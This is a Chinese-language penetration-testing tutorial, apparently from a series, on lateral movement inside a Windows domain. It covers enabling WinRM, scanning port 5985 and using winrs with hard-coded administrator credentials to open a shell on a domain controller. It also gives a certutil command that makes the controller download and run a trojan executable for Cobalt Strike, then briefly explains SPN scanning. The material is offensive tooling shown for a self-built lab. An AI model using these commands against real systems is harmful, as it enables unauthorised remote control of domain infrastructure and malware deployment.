内网横向移动—Kerberos攻击SPN扫描WinRMWinRSRDP( 四 ) _spn

3.1.4. 其它特殊问题
在开启winrm启动服务时，这里会出现是否执行更改，直接输入Y即可，不过也会出现一些其它的问题，例如：
拒绝访问：可以重新以管理员身份进入cmd
提示需要将网络由公用改为域或专用，直接在网络设置中找到以太网将公用改为专用即可
3.2. winRM&winRS测试案例
WinRS 是的远程 Shell，它相当于 WinRM 的客户端，使用它可以访问运行有 WinRM 的服务器，不过自己也得装上 WinRM 才能运行 WinRS 。
3.2.1. 开启winRM
这里如果你控制的是 2008系统，理论上来说是不需要再去操作一遍的，但是最好还是去操作一遍，同时注意开启的时候需要使用高权限哦。低权限无法开启。
winrm quickconfigwinrm set winrm/config/Client @{TrustedHosts="*"}
3.2.2. 端口测试
由于默认情况下winrm使用的是5985端口，那么我们就可以针对这个端口进行扫描，这里可以看到被控主机与域控都开启了winrm，这里需要说以下，如果域控主机是2012 只要管理员不去修改，那么理论上就是开启状态，同时还是允许任意主机区连接，但是如果管理员设置了一些操作，那么…基本上可能就无法成功了，只有想别的突破口了。
3.2.3. winrm利用
这里我们进行连接的时候不是使用winrm而是使用winrs进行连接，同时需要获取密码，至于这个密码怎么获取，应该都了解，直接用cs去抓取即可。
3.2.3.1. 连接域控主机
可以看到这里是能够利用成功的，不过CS上一直显示”句柄无效“，我查了以下资料说需要将IP地址替换成机器名，但是我替换了不过依旧显示句柄无效，搞不懂了。
同时hash值我并没有利用成功，不知道是不是需要设置什么…
winrs -r:192.168.20.1 -u:192.168.20.1\administrator -p:admin@123 ipconfigwinrs -r:[ip] -u:[username] -p:[password]
3.2.3.2. 获得交互式会话
这里输入命令可以获取交互式会话，相当于远程连接到域控的cmd上。
winrs -r:192.168.20.1 -u:192.168.20.1\administrator -p:admin@123 cmd
3.2.4. 上线CS
这里直接让域控下载一个木马，上线即可，需要注意，由于域控是在内网，无法访问到外网，需要使用到转发上线哦，这里我就不操作了，直接给命令，由于我也没搭建web服务器。
winrs -r:192.168.20.1 -u:192.168.20.1\administrator -p:admin@123 "cmd.exe /c certutil -urlcache -split -f http://192.168.20.10/3010.exe 3010.exe & 3010.exe"
3.3. CS内置插件
在CS中是有内置插件的，这里我们在获取端口存活哦，直接使用插件进行转发上线即可，选择一个账户密码即可，不过…我依旧没测试成功，由于环境都是我自己搭建的，所以问题也比较多，其实这样才是最真实的，由于现实环境中，很多管理员设置完并不会考虑这些，所以会有遗漏的或者默认拦截的，导致我们在利用的时候，问题也是很多的。
4. &Spn_请求&破解
这里简单说一下，太复杂了我也还没搞懂。
参考连接
4.1. SPN定义
服务主体名称（SPN）是客户端用于唯一标识给特定目标计算机的服务实例名称。身份验证使用SPN将服务实例与服务登录帐户相关联。如果在整个林中的计算机上安装多个服务实例，则每个实例都必须具有自己的SPN 。如果客户端可能使用多个名称进行身份验证，则给定的服务实例可以具有多个SPN 。例如，SPN总是包含运行服务实例的主机名称，所以服务实例可以为其主机的每个名称或别名注册一个SPN 。
4.2. SPN扫描
spn扫描也可以叫扫描服务实例名称，在环境中发现服务的最佳方法是通过“SPN扫描” 。通过请求特定SPN类型的服务主体名称来查找服务，SPN扫描攻击者通过网络端口扫描的主要好处是SPN扫描不需要连接到网络上的每个IP来检查服务端口。SPN扫描通过LDAP查询向域控制器执行服务发现。由于SPN查询是普通票据的一部分，因此如果不能被查询，但可以用网络端口扫描来确认。